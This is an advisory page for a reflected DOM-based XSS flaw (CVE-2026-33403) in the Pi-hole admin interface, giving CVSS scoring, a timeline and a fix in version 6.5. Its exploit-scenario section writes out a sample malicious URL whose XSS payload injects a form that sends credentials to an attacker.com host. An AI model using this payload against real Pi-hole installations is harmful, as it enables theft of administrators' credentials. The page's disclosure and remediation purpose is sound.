What is the CVSS score of EUVD-2026-19279?

EUVD-2026-19279 has a CVSS 3.1 base score of 6.1 (Medium). CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N. EPSS exploitation probability: 0.1%.

Is there a patch available for EUVD-2026-19279?

Yes, a patch is available for EUVD-2026-19279. Update the affected software to the latest version immediately.

Web Interface EUVD-2026-19279

| CVE-2026-33403 MEDIUM

Cross-site Scripting (XSS) (CWE-79)

2026-04-06 security-advisories@github.com

XSS Web Interface

6.1

CVSS 3.1 · GitHub Advisory

Severity by source

GitHub Advisory PRIMARY

6.1 MEDIUM

AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Required

Scope

Changed

Confidentiality

Low

Integrity

Low

Availability

None

Lifecycle Timeline

Patch available

Apr 16, 2026 - 05:29 EUVD

6.5

EUVD ID Assigned

Apr 06, 2026 - 15:22 euvd

EUVD-2026-19279

Analysis Generated

Apr 06, 2026 - 15:22 vuln.today

CVE Published

Apr 06, 2026 - 15:17 nvd

MEDIUM 6.1

DescriptionGitHub Advisory

Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, a reflected DOM-based XSS vulnerability in taillog.js allows an unauthenticated attacker to inject arbitrary HTML into the Pi-hole admin interface by crafting a malicious URL. The file query parameter is interpolated into an innerHTML assignment without escaping. Because the Content-Security-Policy is missing the form-action directive, injected <form> elements can exfiltrate credentials to an external origin. This vulnerability is fixed in 6.5.

AnalysisAI

Reflected DOM-based XSS in Pi-hole Admin Interface versions 6.0 through 6.4 allows unauthenticated attackers to inject arbitrary HTML via a crafted malicious URL targeting the file parameter in taillog.js, potentially enabling credential exfiltration through injected form elements due to a missing form-action Content-Security-Policy directive; fixed in version 6.5.

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Vulnerability AssessmentAI

Risk Assessment	This vulnerability presents moderate real-world risk despite the 6.1 CVSS score. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker crafts a malicious URL such as http://target-pihole.local/admin/index.php?file=<img%20src=x%20onerror=document.body.innerHTML='<form%20action=%22http://attacker.com/steal%22...> and sends it to a Pi-hole administrator via email or social engineering. When the administrator clicks the link, the injected HTML executes in their browser within the authenticated context of the Pi-hole admin panel. …
Remediation	Upgrade Pi-hole Admin Interface to version 6.5 or later, which contains the fix for this reflected XSS vulnerability. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

EUVD-2026-19279 vulnerability details – vuln.today

Back